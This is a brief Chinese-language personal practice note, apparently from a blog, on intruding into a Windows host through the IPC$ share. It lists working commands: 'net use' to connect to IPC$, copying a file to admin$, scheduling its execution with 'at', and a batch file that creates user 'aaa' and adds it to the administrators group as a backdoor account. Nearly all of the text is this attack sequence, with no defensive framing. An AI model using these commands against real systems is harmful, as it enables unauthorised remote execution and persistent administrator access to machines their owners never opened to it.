IPC$入侵--个人练习

前提:1.远程主机防火墙关闭

      2.远程主机开启了IPC共享(开启了139端口)

步骤:1.net use \\10.10.10.9\IPC$ "密码" /user:""

      2.copy 本地文件 \\10.10.10.9\admin$ 

      3.net time \\10.10.10.9 (查看远程主机时间)

      4.at \\10.10.10.9 时间 "本地文件路径"

      5.以上为在远程主机定时执行某个程序

      6.可以制作一个userAdd.bat:

          net user aaa /add

          net localgroup administrators aaa /add

        这样以后可以用aaa访问此远程主机了。

      7.net start 服务名  开启想要的服务。



你可能感兴趣的:(入侵,ipc$)